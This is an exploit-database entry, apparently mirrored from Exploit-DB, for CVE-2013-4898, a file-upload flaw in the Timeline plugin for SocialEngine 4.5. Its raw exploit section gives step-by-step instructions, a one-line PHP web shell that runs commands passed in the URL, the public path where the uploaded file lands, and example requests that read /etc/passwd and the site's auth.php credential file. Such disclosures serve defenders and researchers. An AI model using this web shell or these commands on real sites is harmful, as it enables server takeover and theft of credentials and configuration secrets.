header-logo
Suggest Exploit
vendor:
SocialEngine 4.5
by:
Wesley Henrique Leite aka 'spyk2r'
4,3
CVSS
MEDIUM
Remote Code Execution
78
CWE
Product Name: SocialEngine 4.5
Affected Version From: plugin Timeline 4.2.5p9 for SocialEngine 4.5
Affected Version To: plugin Timeline 4.2.5p9 for SocialEngine 4.5
Patch Exists: YES
Related CWE: CVE-2013-4898
CPE: a:webhive:socialengine:4.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2013

Sending php file in the timeline plugin cover image of SocialEngine 4.5

Logged into the system, enter on profile page of your user. Click 'Change Cover' and then 'Upload Cover' to select the file '*.php' you want to send. After selecting the file upload, this will be sent to an area temporarily, the system detects that the format is not valid, but doesn’t remove, allowing access later. An error message is displayed on the screen. Access can be gained by going to '/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php' and exploiting the vulnerability with a command such as 'cat /etc/passwd' or 'cat ../../../install/config/auth.php'.

Mitigation:

Ensure that the plugin is up to date and that the server is properly configured to prevent malicious file uploads.
Source

Exploit-DB raw data:

# Exploit Title: Sending php file in the timeline plugin cover image of SocialEngine 4.5 
# Date: 2013-08-17 
# Discovered by: Wesley Henrique Leite aka "spyk2r" 
# Vendor Homepage: http://webhive.com.ua/
# Software Link: http://webhive.com.ua/store/product.php?id_product=46
# Version: plugin Timeline 4.2.5p9 for SocialEngine 4.5 
# Vendor Notified: 2013-08-17
# CVE Notified: 2013-08-24
# CVE : CVE-2013-4898


+ INTRODUCTION

The plugin has the objective give you a better visual for the user
profile, allowed the addition of cover image keeping the layout closest
to the style of modern social networks, among other features.

+ DESCRIPTION OF VULNERABILITY

Logged into the system, enter on profile page of your user. [my profile]

    http://[url]/index.php/profile/[profile-name]

    >> Click "Change Cover"

    >> Click "Upload Cover"

select the file "*.php" you want to send.

//### Example PHP file to send "inject.php" ### 
    <?php echo system("$_GET['cmd']"); ?> 
//###

After selecting the file upload, this will be sent to an area temporarily,
the system detects that the format is not valid, but doesn’t remove,
allowing access later.

an error message is displayed on the screen.

[ File "/srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php" 
is not an image or does not exist ]

+ ACCESS

    /srv/www/htdocs/XXXXXXXXXXX/public/temporary/timeline/cover_original_8.php

The important thing is the structure of public forward, it will give 
us access to our archive.

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20/etc/passwd

    http://[url]/public/temporary/timeline/cover_original_8.php?cmd=cat%20../../../install/config/auth.php

Navigation

Suggest Exploit

Services By CQR